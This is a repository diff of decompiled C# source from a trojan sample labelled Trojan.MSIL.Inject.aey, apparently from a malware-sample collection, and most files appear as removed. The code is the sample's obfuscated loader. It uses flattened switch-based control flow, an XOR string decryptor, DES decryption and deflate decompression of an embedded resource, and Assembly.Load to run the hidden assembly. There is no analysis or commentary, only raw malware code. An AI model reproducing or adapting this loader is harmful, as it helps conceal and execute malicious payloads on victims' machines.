int num3 = 968784119;
int num4 = -376123481;
label_5:
while (true)
{
num4 ^= 370221929;
label_7:
int num5 = 169643759;
while (true)
{
switch (num5 ^ 170977803)
{
case 2909411:
label_8:
num4 = -376123484;
num5 = 169643758;
continue;
case 2909412:
switch (num4 + 8000308)
{
case 0:
goto label_11;
case 1:
switch (num3)
{
case 1949493:
label_14:
num2 = -561798659;
num3 = 968784118;
goto label_4;
case 1949494:
switch (num2 + 7070352)
{
case 0:
switch (num1 + 5290868)
{
case 0:
AppDomain.CurrentDomain.ResourceResolve += new ResolveEventHandler(\uE008.\uE001);
num1 = -226195679;
goto label_2;
case 1:
goto label_22;
default:
goto label_18;
}
case 1:
goto label_19;
case 2:
label_2:
num1 ^= 220971948;
goto label_14;
default:
num3 = 968784116;
goto label_4;
}
case 1949495:
goto label_3;
default:
goto label_13;
}
case 2:
label_4:
num3 ^= 967034817;
goto label_8;
default:
num5 = 169643752;
continue;
}
case 2909413:
goto label_5;
default:
goto label_7;
}
}
label_13:
num4 = -376123483;
}
label_18:
num2 = -561798660;
}
label_22:
\uE008.\uE002 = 1;
}
finally
{
Monitor.Exit(\uE008.\uE001);
}
}
public static string \uE000 => "ed404015d077ea06";
public static Assembly \uE001(object _param0, ResolveEventArgs _param1)
{
if ((\uE008.\uE003 == null ? 0 : 1) == 0)
{
try
{
Monitor.Enter(\uE008.\uE001);
if ((\uE008.\uE003 == null ? 0 : 1) == 0)
{
label_15:
int num1 = 1319863694;
int num2 = -1247360233;
label_3:
Stream manifestResourceStream;
while (true)
{
num2 ^= 1242423639;
label_7:
int num3 = 1536961512;
int num4 = -942752411;
while (true)
{
switch ((num4 ^ 946906395) + 4319108)
{
case 0:
goto label_7;
case 1:
switch (num3)
{
case 2222797:
label_10:
num2 = -1247360152;
num3 = 1536961513;
goto label_4;
case 2222798:
switch (num2 + 5559746)
{
case 0:
goto label_15;
case 1:
switch (num1)
{
case 3571212:
manifestResourceStream = typeof (\uE008).Assembly.GetManifestResourceStream(\uE008.\uE000);
num1 = 1319863695;
goto label_2;
case 3571213:
if (manifestResourceStream != null)
{
num1 = 1319863692;
goto label_2;
}
else
goto label_22;
case 3571214:
goto label_21;
default:
goto label_17;
}
case 2:
label_2:
num1 ^= 1318976386;
goto label_10;
default:
label_13:
int num5 = 357788384;
while (true)
{
switch (num5 ^ 357216823)
{
case 1693911:
num3 = 1536961515;
num5 = 357788399;
continue;
case 1693912:
goto label_4;
default:
goto label_13;
}
}
}
case 2222799:
goto label_3;
default:
num4 = -942752409;
continue;
}
case 2:
label_4:
num3 ^= 1539162406;
break;
}
num4 = -942752410;
}
label_17:
num2 = -1247360151;
}
label_21:
int num6 = 0;
goto label_23;
label_22:
num6 = 1;
label_23:
if (num6 == 0)
\uE008.\uE000 = \uE008.\uE002(manifestResourceStream);
}
}
finally
{
Monitor.Exit(\uE008.\uE001);
}
}
return (!\uE008.\uE003(_param1.Name) ? 1 : 0) == 0 ? \uE008.\uE000 : (Assembly) null;
}
private static Assembly \uE002(Stream _param0)
{
MemoryStream input = \uE010.\uE000(_param0);
BinaryReader binaryReader = new BinaryReader((Stream) input);
label_2:
int num1 = -976949257;
int length;
int index;
string[] strArray;
while (true)
{
switch ((num1 ^ 979141528) + 6787986)
{
case 0:
strArray = new string[length];
num1 = -976949272;
continue;
case 1:
length = binaryReader.ReadInt32();
num1 = -976949258;
continue;
case 2:
index = 0;
num1 = -976949271;
continue;
case 3:
if (index != 0)
{
num1 = -976949270;
continue;
}
goto label_9;
case 4:
goto label_8;
default:
goto label_2;
}
}
label_8:
int num2 = 0;
goto label_10;
label_9:
num2 = 1;
label_10:
if (num2 != 0)
goto label_12;
label_11:
strArray[index] = binaryReader.ReadString();
++index;
label_12:
if ((index >= length ? 0 : 1) == 0)
{
\uE008.\uE003 = strArray;
label_25:
int num3 = -143477510;
int num4 = -1430655755;
label_15:
byte[] numArray;
while (true)
{
num4 ^= 1426872453;
label_19:
int num5 = -80790779;
int num6 = -1051659499;
while (true)
{
switch ((num6 ^ 1053901982) + 8276087)
{
case 0:
goto label_19;
case 1:
switch (num5 + 7895701)
{
case 0:
label_22:
num4 = -1430655766;
num5 = -80790780;
goto label_16;
case 1:
switch (num4 + 4869010)
{
case 0:
goto label_25;
case 1:
int count;
switch (num3 + 4299732)
{
case 0:
numArray = new byte[count];
num3 = -143477511;
goto label_14;
case 1:
binaryReader.Read(numArray, 0, count);
num3 = -143477509;
goto label_14;
case 2:
count = (int) (input.Length - input.Position);
num3 = -143477512;
goto label_14;
case 3:
goto label_31;
default:
goto label_27;
}
case 2:
label_14:
num3 ^= 147640532;
goto label_22;
default:
num5 = -80790782;
goto label_16;
}
case 2:
goto label_15;
default:
num6 = -1051659497;
continue;
}
case 2:
label_16:
num5 ^= 78167657;
break;
}
num6 = -1051659500;
}
label_27:
num4 = -1430655765;
}
label_31:
return Assembly.Load(numArray);
}
goto label_11;
}
private static bool \uE003(string _param0)
{
if ((\uE008.\uE003 == null ? 1 : 0) == 0)
{
label_6:
int num1 = 1477415917;
int num2 = 601725783;
int index;
string[] strArray;
while (true)
{
switch (num2 ^ 602759493)
{
case 3209744:
switch (num1)
{
case 3757452:
if (index != 0)
{
num1 = 1477415916;
goto label_1;
}
else
goto label_12;
case 3757453:
index = 0;
num1 = 1477415919;
goto label_1;
case 3757454:
strArray = \uE008.\uE003;
num1 = 1477415918;
goto label_1;
case 3757455:
goto label_11;
default:
num2 = 601725780;
continue;
}
case 3209745:
goto label_6;
case 3209746:
label_1:
num1 ^= 1479984739;
break;
}
num2 = 601725781;
}
label_11:
int num3 = 0;
goto label_13;
label_12:
num3 = 1;
label_13:
if (num3 != 0)
goto label_27;
label_14:
string str = strArray[index];
if ((!_param0.Equals(str) ? 1 : 0) == 0)
{
label_22:
int num4 = -311275153;
int num5 = 878119074;
label_16:
bool flag;
while (true)
{
num5 ^= 880632524;
label_18:
int num6 = -433645422;
while (true)
{
switch ((num6 ^ 431101690) + 7008665)
{
case 0:
label_19:
num5 = 878119073;
num6 = -433645421;
continue;
case 1:
switch (num5)
{
case 2779756:
goto label_22;
case 2779757:
switch (num4 + 4671099)
{
case 0:
flag = true;
num4 = -311275156;
goto label_15;
case 1:
goto label_29;
default:
goto label_24;
}
case 2779758:
label_15:
num4 ^= 315287786;
goto label_19;
default:
num6 = -433645411;
continue;
}
case 2:
goto label_16;
default:
goto label_18;
}
}
label_24:
num5 = 878119072;
}
label_29:
return flag;
}
++index;
label_27:
if ((index >= strArray.Length ? 0 : 1) != 0)
goto label_14;
}
return false;
}
}

46
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.aey-987a459213fe3739f0b3a9599a965c98fd7ffe48217cb7051649767b5815a87d/.cs
View File

@ -1,46 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Monkey, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F37CDE57-2934-4BAC-94FE-68C4082667EF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.Inject.aey-987a459213fe3739f0b3a9599a965c98fd7ffe48217cb7051649767b5815a87d.exe
using System.IO;
using System.Reflection;
internal sealed class \uE009
{
public static string \uE000(string _param0, int _param1) => string.Intern(\uE009.\uE000.\uE000.\uE000(_param0, _param1));
public static string \uE000 => "84785c03fc20bf7c";
private sealed class \uE000
{
public static readonly \uE009.\uE000 \uE000;
private byte[] \uE001;
static \uE000()
{
\uE008.\uE000();
\uE009.\uE000.\uE000 = new \uE009.\uE000();
}
private \uE000()
{
Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(\uE009.\uE000);
if (manifestResourceStream == null)
return;
this.\uE001 = new byte[256];
manifestResourceStream.Read(this.\uE001, 0, this.\uE001.Length);
}
public string \uE000(string _param1, int _param2)
{
int length = _param1.Length;
int index = _param2 & (int) byte.MaxValue;
char[] charArray = _param1.ToCharArray();
while (--length >= 0)
charArray[length] = (char) ((uint) charArray[length] ^ ((uint) this.\uE001[index] | (uint) _param2));
return string.Intern(new string(charArray));
}
}
}

1058
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.aey-987a459213fe3739f0b3a9599a965c98fd7ffe48217cb7051649767b5815a87d/.cs
View File

File diff suppressed because it is too large Load Diff

11
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.aey-987a459213fe3739f0b3a9599a965c98fd7ffe48217cb7051649767b5815a87d/.cs
View File

@ -1,11 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Monkey, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F37CDE57-2934-4BAC-94FE-68C4082667EF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.Inject.aey-987a459213fe3739f0b3a9599a965c98fd7ffe48217cb7051649767b5815a87d.exe
internal struct \uE00B
{
public int \uE000;
public int \uE001;
}

13
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.aey-987a459213fe3739f0b3a9599a965c98fd7ffe48217cb7051649767b5815a87d/.cs
View File

@ -1,13 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Monkey, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F37CDE57-2934-4BAC-94FE-68C4082667EF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.Inject.aey-987a459213fe3739f0b3a9599a965c98fd7ffe48217cb7051649767b5815a87d.exe
internal sealed class \uE00C
{
internal bool \uE000;
internal ushort \uE001;
internal \uE00C \uE002;
internal \uE00C \uE003;
}

11
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.aey-987a459213fe3739f0b3a9599a965c98fd7ffe48217cb7051649767b5815a87d/.cs
View File

@ -1,11 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Monkey, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F37CDE57-2934-4BAC-94FE-68C4082667EF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.Inject.aey-987a459213fe3739f0b3a9599a965c98fd7ffe48217cb7051649767b5815a87d.exe
internal sealed class \uE00D
{
internal \uE00C \uE000;
internal \uE00C \uE001;
}

798
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.aey-987a459213fe3739f0b3a9599a965c98fd7ffe48217cb7051649767b5815a87d/.cs
View File

@ -1,798 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Monkey, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F37CDE57-2934-4BAC-94FE-68C4082667EF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.Inject.aey-987a459213fe3739f0b3a9599a965c98fd7ffe48217cb7051649767b5815a87d.exe
using System;
using System.IO;
internal sealed class \uE00E
{
public static void \uE000(Stream _param0, Stream _param1)
{
byte[] buffer = new byte[4096];
\uE00E.\uE000 obj = new \uE00E.\uE000(_param0);
while (true)
{
int count = obj.\uE000(buffer, 0, buffer.Length);
if ((count <= 0 ? 0 : 1) != 0)
_param1.Write(buffer, 0, count);
else
break;
}
}
public sealed class \uE000
{
private \uE00E.\uE009 \uE000 = new \uE00E.\uE009(32769);
private \uE00E.\uE008 \uE001;
private \uE00D \uE002;
private int \uE003 = -1;
private int \uE004 = -1;
private bool \uE005;
private int \uE006;
private long \uE007;
private long \uE008;
private bool \uE009;
private int \uE00A;
private bool \uE00B;
public \uE000(Stream _param1) => this.\uE001 = new \uE00E.\uE008(_param1);
public int \uE000(byte[] _param1, int _param2, int _param3)
{
if ((_param1 == null ? 0 : 1) == 0)
throw new ArgumentNullException();
if (_param3 == 0 || this.\uE009)
return 0;
int num1 = 0;
label_15:
while (num1 < _param3)
{
while (this.\uE003 < 0 && !this.\uE009)
this.\uE009 = !this.\uE001();
if (!this.\uE009)
{
int num2 = this.\uE002(_param1, _param2 + num1, _param3 - num1);
label_10:
int num3 = 0;
while (true)
{
switch (num3)
{
case 0:
if (num2 > 0)
{
num3 = 1;
continue;
}
goto label_14;
case 1:
num1 += num2;
num3 = 2;
continue;
case 2:
goto label_15;
default:
goto label_10;
}
}
label_14:
this.\uE003 = -1;
}
else
break;
}
return num1;
}
private bool \uE001()
{
if ((!this.\uE005 ? 1 : 0) == 0)
return false;
this.\uE007 = this.\uE001.\uE004;
label_4:
int num1 = 2;
int num2;
while (true)
{
switch (num1)
{
case 0:
switch (num2)
{
case 0:
goto label_10;
case 1:
goto label_13;
case 2:
goto label_14;
default:
num1 = 4;
continue;
}
case 1:
this.\uE003 = this.\uE001.\uE000(2);
num1 = 3;
continue;
case 2:
this.\uE005 = this.\uE001.\uE000(1) > 0;
num1 = 1;
continue;
case 3:
num2 = this.\uE003;
num1 = 0;
continue;
case 4:
goto label_15;
default:
goto label_4;
}
}
label_10:
this.\uE001.\uE001();
int num3 = this.\uE001.\uE000(16);
int num4 = this.\uE001.\uE000(16);
this.\uE006 = (num3 & ~num4) == num3 ? num3 : throw new InvalidOperationException();
this.\uE002 = (\uE00D) null;
this.\uE00B = true;
goto label_16;
label_13:
\uE00B[] objArray1 = \uE00A.\uE011;
\uE00B[] objArray2 = \uE00A.\uE012;
this.\uE006 = 0;
this.\uE002 = \uE00A.\uE013;
this.\uE00B = false;
goto label_16;
label_14:
\uE00B[] objArray3;
\uE00B[] objArray4;
this.\uE009(this.\uE001, out objArray3, out objArray4);
this.\uE006 = 0;
this.\uE002 = \uE00A.\uE004(objArray3, objArray4);
this.\uE00B = false;
goto label_16;
label_15:
throw new InvalidOperationException();
label_16:
this.\uE008 = this.\uE001.\uE004;
return true;
}
private int \uE002(byte[] _param1, int _param2, int _param3)
{
int num1 = _param2;
if ((this.\uE003 == 0 ? 0 : 1) == 0)
{
if (this.\uE006 > 0)
{
int num2 = Math.Min(_param3, this.\uE006);
label_4:
int num3 = 3;
while (true)
{
switch (num3)
{
case 0:
_param2 += num2;
num3 = 5;
continue;
case 1:
_param3 -= num2;
num3 = 0;
continue;
case 2:
this.\uE000.\uE001(_param1, _param2, num2);
num3 = 4;
continue;
case 3:
this.\uE001.\uE002(_param1, _param2, num2);
num3 = 2;
continue;
case 4:
this.\uE006 -= num2;
num3 = 1;
continue;
case 5:
goto label_22;
default:
goto label_4;
}
}
}
}
else if (!this.\uE00B)
{
if (this.\uE00A > 0)
this.\uE003(_param1, ref _param2, ref _param3);
if (_param3 > 0)
{
do
{
int num4 = \uE00E.\uE000.\uE006(this.\uE001, this.\uE002.\uE000);
this.\uE00B = num4 == 256;
if (!this.\uE00B)
{
if (num4 < 256)
{
_param1[_param2++] = (byte) num4;
this.\uE000.\uE000((byte) num4);
--_param3;
}
else if (num4 <= 285)
{
int num5 = \uE00E.\uE000.\uE007(this.\uE001, num4);
int num6 = \uE00E.\uE000.\uE008(this.\uE001, this.\uE002.\uE001);
if ((long) num6 > this.\uE000.\uE003)
throw new InvalidOperationException();
this.\uE004 = num6;
this.\uE00A = num5;
this.\uE003(_param1, ref _param2, ref _param3);
}
}
else
break;
}
while (_param3 > 0);
}
}
label_22:
this.\uE008 = this.\uE001.\uE004;
return _param2 - num1;
}
private void \uE003(byte[] _param1, ref int _param2, ref int _param3)
{
int num1 = Math.Min(this.\uE00A, _param3);
byte[] sourceArray = this.\uE000.\uE002(this.\uE004, Math.Min(num1, this.\uE004));
_param3 -= num1;
this.\uE00A -= num1;
while ((num1 <= sourceArray.Length ? 0 : 1) != 0)
{
Array.Copy((Array) sourceArray, 0, (Array) _param1, _param2, sourceArray.Length);
label_3:
int num2 = 0;
while (true)
{
switch (num2)
{
case 0:
_param2 += sourceArray.Length;
num2 = 1;
continue;
case 1:
num1 -= sourceArray.Length;
num2 = 2;
continue;
case 2:
goto label_6;
default:
goto label_3;
}
}
label_6:
this.\uE000.\uE001(sourceArray, 0, sourceArray.Length);
}
Array.Copy((Array) sourceArray, 0, (Array) _param1, _param2, num1);
_param2 += num1;
this.\uE000.\uE001(sourceArray, 0, num1);
}
public bool \uE004(int _param1)
{
byte[] numArray = new byte[1024];
int num;
while (_param1 > 0 && ((num = this.\uE000(numArray, 0, Math.Min(1024, _param1))) <= 0 ? 0 : 1) != 0)
_param1 -= num;
return _param1 <= 0;
}
public void \uE005()
{
byte[] numArray = new byte[1024];
do
;
while (this.\uE000(numArray, 0, 1024) > 0);
}
private static int \uE006(\uE00E.\uE008 _param0, \uE00C _param1)
{
while (true)
{
if (_param1 == null)
goto label_7;
else
goto label_4;
label_3:
int num;
while (true)
{
switch (num)
{
case 0:
if (_param1.\uE000)
{
num = 1;
continue;
}
goto label_1;
case 1:
goto label_7;
case 2:
goto label_9;
default:
goto label_4;
}
}
label_1:
_param1 = (_param0.\uE000(1) <= 0 ? 0 : 1) != 0 ? _param1.\uE003 : _param1.\uE002;
continue;
label_4:
num = 0;
goto label_3;
label_7:
if (_param1 == null)
{
num = 2;
goto label_3;
}
else
goto label_10;
}
label_9:
throw new InvalidOperationException();
label_10:
return (int) _param1.\uE001;
}
private static int \uE007(\uE00E.\uE008 _param0, int _param1)
{
int num1;
int num2;
\uE00A.\uE007(_param1, out num1, out num2);
label_2:
int num3 = 0;
while (true)
{
switch (num3)
{
case 0:
if (num2 > 0)
{
num3 = 1;
continue;
}
goto label_6;
case 1:
goto label_5;
default:
goto label_2;
}
}
label_5:
return num1 + _param0.\uE000(num2);
label_6:
return num1;
}
private static int \uE008(\uE00E.\uE008 _param0, \uE00C _param1)
{
int index = \uE00E.\uE000.\uE006(_param0, _param1);
int num1 = index <= 29 ? \uE00A.\uE017[index] : throw new InvalidOperationException();
label_4:
int num2 = 1;
int num3;
int num4;
while (true)
{
switch (num2)
{
case 0:
if (num3 > 0)
{
num2 = 4;
continue;
}
goto label_15;
case 1:
num3 = \uE00A.\uE018[index];
num2 = 0;
continue;
case 2:
if (index == 284)
{
num2 = 3;
continue;
}
goto label_14;
case 3:
if (num4 > 30)
{
num2 = 5;
continue;
}
goto label_14;
case 4:
num4 = _param0.\uE000(num3);
num2 = 2;
continue;
case 5:
goto label_13;
default:
goto label_4;
}
}
label_13:
throw new InvalidOperationException();
label_14:
return num1 + num4;
label_15:
return num1;
}
private void \uE009(\uE00E.\uE008 _param1, out \uE00B[] _param2, out \uE00B[] _param3)
{
int length1 = _param1.\uE000(5) + 257;
label_2:
int num1 = 1;
int num2;
int length2;
while (true)
{
switch (num1)
{
case 0:
num2 = _param1.\uE000(4) + 4;
num1 = 2;
continue;
case 1:
length2 = _param1.\uE000(5) + 1;
num1 = 0;
continue;
case 2:
if (length1 > 286)
{
num1 = 3;
continue;
}
goto label_8;
case 3:
goto label_7;
default:
goto label_2;
}
}
label_7:
throw new InvalidOperationException();
label_8:
int[] numArray1 = \uE00A.\uE014;
int[] numArray2 = new int[19];
int index1 = 0;
if ((index1 == 0 ? 1 : 0) != 0)
goto label_10;
label_9:
numArray2[numArray1[index1]] = _param1.\uE000(3);
++index1;
label_10:
if (index1 >= num2)
{
\uE00C obj = \uE00A.\uE005(\uE00A.\uE002(numArray2));
int[] numArray3 = \uE00E.\uE000.\uE00A(_param1, obj, length1 + length2);
_param2 = new \uE00B[length1];
for (int index2 = 0; index2 < length1; ++index2)
_param2[index2].\uE001 = numArray3[index2];
\uE00A.\uE003(_param2);
_param3 = new \uE00B[length2];
for (int index3 = 0; index3 < length2; ++index3)
_param3[index3].\uE001 = numArray3[index3 + length1];
\uE00A.\uE003(_param3);
}
else
goto label_9;
}
private static int[] \uE00A(\uE00E.\uE008 _param0, \uE00C _param1, int _param2)
{
int[] numArray = new int[_param2];
int index1 = 0;
if ((index1 == 0 ? 1 : 0) != 0)
goto label_22;
label_1:
int num1 = \uE00E.\uE000.\uE006(_param0, _param1);
label_3:
int num2 = 1;
while (true)
{
switch (num2)
{
case 0:
numArray[index1] = num1;
num2 = 2;
continue;
case 1:
if (num1 < 16)
{
num2 = 0;
continue;
}
goto label_7;
case 2:
goto label_21;
default:
goto label_3;
}
}
label_7:
switch (num1)
{
case 16:
int num3 = _param0.\uE000(2) + 3;
if (num3 + index1 > numArray.Length)
throw new InvalidOperationException();
for (int index2 = 0; index2 < num3; ++index2)
numArray[index1 + index2] = numArray[index1 - 1];
index1 += num3 - 1;
break;
case 17:
int num4 = _param0.\uE000(3) + 3;
if (num4 + index1 > numArray.Length)
throw new InvalidOperationException();
index1 += num4 - 1;
break;
case 18:
int num5 = _param0.\uE000(7) + 11;
if (num5 + index1 > numArray.Length)
throw new InvalidOperationException();
index1 += num5 - 1;
break;
default:
throw new InvalidOperationException();
}
label_21:
++index1;
label_22:
if (index1 >= _param2)
return numArray;
goto label_1;
}
}
private sealed class \uE008
{
private uint \uE000;
private int \uE001;
private int \uE002;
private Stream \uE003;
internal long \uE004;
internal \uE008(Stream _param1) => this.\uE003 = _param1;
internal int \uE000(int _param1)
{
this.\uE004 += (long) _param1;
for (int index = _param1 - (this.\uE002 - this.\uE001); (index <= 0 ? 0 : 1) != 0; index -= 8)
{
this.\uE000 |= checked ((uint) this.\uE003.ReadByte()) << this.\uE002;
this.\uE002 += 8;
}
int num1 = (int) (this.\uE000 >> this.\uE001) & (1 << _param1) - 1;
label_5:
int num2 = 2;
while (true)
{
switch (num2)
{
case 0:
this.\uE002 = this.\uE001 = 0;
num2 = 1;
continue;
case 1:
this.\uE000 = 0U;
num2 = 4;
continue;
case 2:
this.\uE001 += _param1;
num2 = 3;
continue;
case 3:
if (this.\uE002 == this.\uE001)
{
num2 = 0;
continue;
}
goto label_11;
case 4:
goto label_13;
default:
goto label_5;
}
}
label_11:
if (this.\uE001 >= 8)
{
this.\uE000 >>= this.\uE001;
this.\uE002 -= this.\uE001;
this.\uE001 = 0;
}
label_13:
return num1;
}
internal void \uE001()
{
if (this.\uE002 != this.\uE001)
this.\uE004 += (long) (this.\uE002 - this.\uE001);
this.\uE002 = this.\uE001 = 0;
label_4:
int num = 0;
while (true)
{
switch (num)
{
case 0:
this.\uE000 = 0U;
num = 1;
continue;
case 1:
goto label_6;
default:
goto label_4;
}
}
label_6:;
}
internal void \uE002(byte[] _param1, int _param2, int _param3)
{
if (this.\uE002 != this.\uE001)
throw new InvalidOperationException();
int num1 = this.\uE003.Read(_param1, _param2, _param3);
label_4:
int num2 = 0;
while (true)
{
switch (num2)
{
case 0:
this.\uE004 += (long) (num1 << 3);
num2 = 1;
continue;
case 1:
if (num1 != _param3)
{
num2 = 2;
continue;
}
goto label_7;
case 2:
goto label_9;
default:
goto label_4;
}
}
label_7:
return;
label_9:
throw new InvalidOperationException();
}
}
private sealed class \uE009
{
private byte[] \uE000;
private int \uE001;
internal int \uE002;
internal long \uE003;
internal \uE009(int _param1)
{
this.\uE002 = _param1;
this.\uE000 = new byte[_param1];
}
internal void \uE000(byte _param1)
{
this.\uE000[this.\uE001++] = _param1;
if ((this.\uE001 >= this.\uE002 ? 0 : 1) == 0)
this.\uE001 = 0;
++this.\uE003;
}
internal void \uE001(byte[] _param1, int _param2, int _param3)
{
this.\uE003 += (long) _param3;
if ((_param3 >= this.\uE002 ? 0 : 1) == 0)
{
Array.Copy((Array) _param1, _param2, (Array) this.\uE000, 0, this.\uE002);
this.\uE001 = 0;
}
else if (this.\uE001 + _param3 > this.\uE002)
{
int length1 = this.\uE002 - this.\uE001;
label_5:
int num = 2;
int length2;
while (true)
{
switch (num)
{
case 0:
Array.Copy((Array) _param1, _param2 + length1, (Array) this.\uE000, 0, length2);
num = 1;
continue;
case 1:
this.\uE001 = length2;
num = 4;
continue;
case 2:
length2 = this.\uE001 + _param3 - this.\uE002;
num = 3;
continue;
case 3:
Array.Copy((Array) _param1, _param2, (Array) this.\uE000, this.\uE001, length1);
num = 0;
continue;
case 4:
goto label_12;
default:
goto label_5;
}
}
label_12:;
}
else
{
Array.Copy((Array) _param1, _param2, (Array) this.\uE000, this.\uE001, _param3);
this.\uE001 += _param3;
if (this.\uE001 != this.\uE002)
return;
this.\uE001 = 0;
}
}
internal byte[] \uE002(int _param1, int _param2)
{
byte[] destinationArray = new byte[_param2];
if ((this.\uE001 >= _param1 ? 0 : 1) == 0)
{
Array.Copy((Array) this.\uE000, this.\uE001 - _param1, (Array) destinationArray, 0, _param2);
}
else
{
int num1 = _param1 - this.\uE001;
label_4:
int num2 = 1;
while (true)
{
switch (num2)
{
case 0:
Array.Copy((Array) this.\uE000, 0, (Array) destinationArray, num1, _param2 - num1);
num2 = 3;
continue;
case 1:
if (num1 < _param2)
{
num2 = 2;
continue;
}
goto label_9;
case 2:
Array.Copy((Array) this.\uE000, this.\uE002 - num1, (Array) destinationArray, 0, num1);
num2 = 0;
continue;
case 3:
goto label_10;
default:
goto label_4;
}
}
label_9:
Array.Copy((Array) this.\uE000, this.\uE002 - num1, (Array) destinationArray, 0, _param2);
}
label_10:
return destinationArray;
}
}
}

1584
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.aey-987a459213fe3739f0b3a9599a965c98fd7ffe48217cb7051649767b5815a87d/.cs
View File

File diff suppressed because it is too large Load Diff

419
MSIL/Trojan/MSIL/I/Trojan.MSIL.Inject.aey-987a459213fe3739f0b3a9599a965c98fd7ffe48217cb7051649767b5815a87d/.cs
View File

@ -1,419 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Monkey, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F37CDE57-2934-4BAC-94FE-68C4082667EF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.Inject.aey-987a459213fe3739f0b3a9599a965c98fd7ffe48217cb7051649767b5815a87d.exe
using System;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;
internal sealed class \uE010
{
private const int \uE000 = 8;
private const int \uE001 = 20;
private const int \uE002 = 4;
private static byte[] \uE003 = new byte[4];
private static byte[] \uE004;
static \uE010()
{
label_2:
int num = 0;
while (true)
{
switch (num)
{
case 0:
\uE010.\uE004 = new byte[4];
num = 4;
continue;
case 1:
\uE010.\uE003[1] = \uE010.\uE004[1] = (byte) 83;
num = 3;
continue;
case 2:
\uE010.\uE004[3] = (byte) 50;
num = 6;
continue;
case 3:
\uE010.\uE003[2] = \uE010.\uE004[2] = (byte) 65;
num = 5;
continue;
case 4:
\uE010.\uE003[0] = \uE010.\uE004[0] = (byte) 82;
num = 1;
continue;
case 5:
\uE010.\uE003[3] = (byte) 49;
num = 2;
continue;
case 6:
goto label_9;
default:
goto label_2;
}
}
label_9:;
}
public static MemoryStream \uE000(Stream _param0)
{
BinaryReader binaryReader1 = new BinaryReader(_param0);
DESCryptoServiceProvider cryptoServiceProvider1 = new DESCryptoServiceProvider();
bool flag1 = binaryReader1.ReadBoolean();
int count1 = (int) binaryReader1.ReadUInt16();
byte[] buffer1 = new byte[count1];
binaryReader1.Read(buffer1, 0, count1);
if ((!flag1 ? 1 : 0) == 0)
{
byte[] buffer2 = new byte[8];
binaryReader1.Read(buffer2, 0, 8);
for (int index = 0; index < count1; ++index)
buffer1[index] = (byte) ((uint) buffer1[index] ^ (uint) buffer2[index % 8]);
}
BinaryReader binaryReader2 = new BinaryReader((Stream) new MemoryStream(buffer1, false));
label_6:
int num = 7;
int count2;
int count3;
bool flag2;
byte[] numArray;
byte[] buffer3;
bool flag3;
while (true)
{
switch (num)
{
case 0:
count2 = (int) binaryReader2.ReadByte();
num = 3;
continue;
case 1:
count3 = (int) binaryReader2.ReadByte();
num = 8;
continue;
case 2:
flag2 = binaryReader2.ReadBoolean();
num = 0;
continue;
case 3:
numArray = new byte[count2];
num = 4;
continue;
case 4:
if (flag2)
{
num = 10;
continue;
}
goto label_19;
case 5:
binaryReader2.Read(buffer3, 0, count3);
num = 6;
continue;
case 6:
cryptoServiceProvider1.IV = buffer3;
num = 2;
continue;
case 7:
binaryReader2.ReadString();
num = 9;
continue;
case 8:
buffer3 = new byte[count3];
num = 5;
continue;
case 9:
flag3 = binaryReader2.ReadBoolean();
num = 1;
continue;
case 10:
goto label_18;
default:
goto label_6;
}
}
label_18:
binaryReader2.Read(numArray, 0, count2);
label_19:
RSACryptoServiceProvider cryptoServiceProvider2 = (RSACryptoServiceProvider) null;
int count4 = binaryReader2.ReadInt32();
byte[] buffer4 = new byte[count4];
binaryReader2.Read(buffer4, 0, count4);
if (!flag2)
{
byte[] publicKey = Assembly.GetExecutingAssembly().GetName().GetPublicKey();
if (publicKey == null || publicKey.Length != 160)
throw new InvalidOperationException();
Buffer.BlockCopy((Array) publicKey, 12, (Array) numArray, 0, count2);
numArray[5] |= (byte) 128;
cryptoServiceProvider2 = new RSACryptoServiceProvider();
cryptoServiceProvider2.ImportParameters(\uE010.\uE003(publicKey));
}
cryptoServiceProvider1.Key = numArray;
MemoryStream memoryStream = new MemoryStream();
using (CryptoStream cryptoStream = new CryptoStream(binaryReader1.BaseStream, cryptoServiceProvider1.CreateDecryptor(), CryptoStreamMode.Read))
{
if (flag3)
\uE00E.\uE000((Stream) cryptoStream, (Stream) memoryStream);
else
\uE010.\uE002((Stream) cryptoStream, (Stream) memoryStream);
}
if (cryptoServiceProvider2 != null)
{
memoryStream.Position = 0L;
if (!\uE010.\uE005(cryptoServiceProvider2, (Stream) memoryStream, buffer4))
throw new InvalidOperationException();
}
memoryStream.Position = 0L;
return memoryStream;
}
private static byte[] \uE001(byte[] _param0, int _param1, int _param2)
{
if ((_param0 == null ? 1 : 0) == 0)
{
label_2:
int num = 0;
while (true)
{
switch (num)
{
case 0:
if (_param0.Length < _param1 + _param2)
{
num = 1;
continue;
}
goto label_6;
case 1:
goto label_5;
default:
goto label_2;
}
}
label_6:
byte[] destinationArray = new byte[_param2];
